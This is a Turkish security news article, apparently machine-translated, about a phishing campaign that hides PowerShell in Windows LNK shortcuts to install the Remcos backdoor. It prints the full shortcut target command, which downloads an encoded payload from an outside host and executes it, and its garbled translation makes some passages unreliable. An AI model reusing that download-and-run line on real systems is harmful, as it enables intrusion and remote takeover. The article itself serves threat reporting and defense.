Son haftalarda, siber güvenlik ekipleri, sofistike arka kapı sunmak için Windows kısayolu (LNK) dosyalarını kullanan kötü niyetli kampanyalarda bir artış gözlemlediler.
Bu yeni saldırı dalgası, LNK kısayollarını zararsız belgeler veya klasörler olarak gizler ve Windows’un kullanıcıları aldatmak için bilinen dosya uzantılarını gizlemenin varsayılan davranışına dayanır.
Kısayol, yürütüldükten sonra, PowerShell’i gizli pencere parametreleriyle sessizce çağırır, sonuçta Remcos arka kapısını yükleyen bir Base64 yükünü getirir ve kodlar.
Bu zincirin gizli doğası-sosyal mühendisliği, sözsüz komut dosyasını ve arazi yaşamını ortadan kaldıran-kurumsal ortamları hedefleyen tehdit aktörlerinin gelişen taktiklerini ortaya koyuyor.
Point Wild analistleri, ilk teslimatın genellikle fatura veya nakliye belgeleri olarak etiketlenmiş ekler ile kimlik avı e -postaları aracılığıyla geldiğini belirtti.
Diğer durumlarda, tehdit aktörleri bu kötü niyetli kısayolları ZIP veya RAR arşivlerine ağ paylaşımlarına dikerek, yürütmeyi tetiklemek için gündelik göz atmaya güvenir.
.webp)
Çift tıkladıktan sonra, LNK dosyası sessizce başlatılır powershell.exe -WindowStyle hidden -Command (…)kurbanın makinesini uzak bir sunucudan gizlenmiş bir yük indirmeye yönlendirir.
Point Wild Researchers, indirilen dosyanın bir .gif uzantısı ile maskelendiğini, ancak Base64 kodlu ikili verileri içerdiğini belirledi.
Kampanyanın omurgası çok aşamalı bir enfeksiyon iş akışıdır. Gömülü PowerShell betiği, kodlanmış bir metin kaynağını alır ve C:\ProgramData\HEW.GIFadlı bir Windows PIF dosyasında kod çözer CHROME.PIF aracılığıyla [System.Convert]::FromBase64Stringsonra bu ikili yürütür.
.webp)
Krom temalı bir program olarak gizlenen PIF dosyası, modern güvenlik uyarılarını atlamak için MS-DOS kısayollarına eski desteği kullanır. Başlatıldıktan sonra, kalıcılığı sağlamak ve daha fazla yük yürütmeyi kolaylaştırmak için planlanmış bir görev kısaylığı ve bir URL dosyası da dahil olmak üzere ek eserler bırakır.
Etki değerlendirmeleri, Remcos Backdoor’un saldırganlara tehlikeye atılan ana bilgisayarlar üzerinde tam uzaktan kumanda verdiğini ortaya koyuyor.
Remcos, özel bir ikili protokolle TCP üzerinden iletişim kurarak keyfi kabuk komutu yürütme, dosya aktarımı, keyloglama ve hatta web kamerası yakalamasını sağlıyor.
Kötü amaçlı yazılım depolamalarından sonra kurbanlar genellikle ihlalden habersiz kalır. C:\ProgramData\remcos\logs.dat ve Doğu Avrupa’da barındırılan komut ve kontrol sunucuları ile şifreli kanallar oluşturur.
Gizli yürütme ve sağlam uzaktan yeteneklerin kombinasyonu, yanal hareket ve veri açığa çıkışının ilk uzlaşmayı izleyebileceği kurumsal ağlar için önemli bir risk oluşturmaktadır.
Enfeksiyon mekanizması
Enfeksiyon mekanizması, kötü niyetli komutlar yüklemek için LNK dosya özelliklerinden yararlanmaya bağlıdır. Ofis makrolarının aksine, LNK dosyaları makro güvenlik uyarılarını tetiklemez ve kullanıcı şüphesi olmadan yürütülmeye izin verir.
Bu kampanyada, LNK’nın “hedef” alanı şu şekilde ayarlanmıştır:-
C:\windows\System32\WindowsPowerShell\v1.0\powershell.exe -WindowStyle hidden -Command (new-object System.Net.WebClient).DownloadFile('https://shipping-hr.ro/m/r/r.txt','C:\\ProgramData\\HEW.GIF'); $file="C:\\ProgramData\\HEW.GIF"; [System.Convert]::FromBase64String((Get-Content $file)) | Set-Content C:\\ProgramData\\CHROME.PIF -Encoding Byte; start C:\\ProgramData\\CHROME.PIFBu tek satırlık komut, Filless saldırılarının zarafetini gösterir: System.Net.WebClient Base64 blobunu almak için, tamamen çözer ve tamamen bellekte yürütür.
Enfeksiyon iş akışı, Windows’un aldatıcı olanı nasıl görüntülediğini gösterirken .lnk simge, gerçek yük yolunu gizleme.
.webp)
Saldırganlar daha da kötü amaçlı yazılımları alternatif veri akışlarına yerleştirerek veya simge yolunu kötü amaçlı DLL’lere işaret etmek için, Windows kısayol simgesini oluşturmaya çalıştığında kod yürütmeyi tetikleyerek algılamayı gizler.
LNK dosyalarını silahlandırarak, rakipler yürütülebilir dosya bloklarına ve makro algılamalara odaklanan birçok uç nokta korumasını atlar.
PowerShell ve CMD gibi güvenilir sistem ikili dosyalarına güven, Remcos yükleyicisinin imza tabanlı antivirüs araçlarından kaçmasına izin verir.
Savunucular için, olağandışı PowerShell çağrılarını ve Şüpheli Alanlara Giden Bağlantıları İzlemek shipping-hr.ro kritiktir.
Planlanan görevlere, reklam kullanımı ve yeni oluşturulan gelişmiş görünürlük .PIF Dosyalar bu büyüyen tehdidi tanımlamaya ve içermeye yardımcı olabilir.
Entegre etmek Herhangi biri. Gelişmiş tehditleri analiz etmek için siem veya soar ile -> 50 ücretsiz deneme aramasını deneyin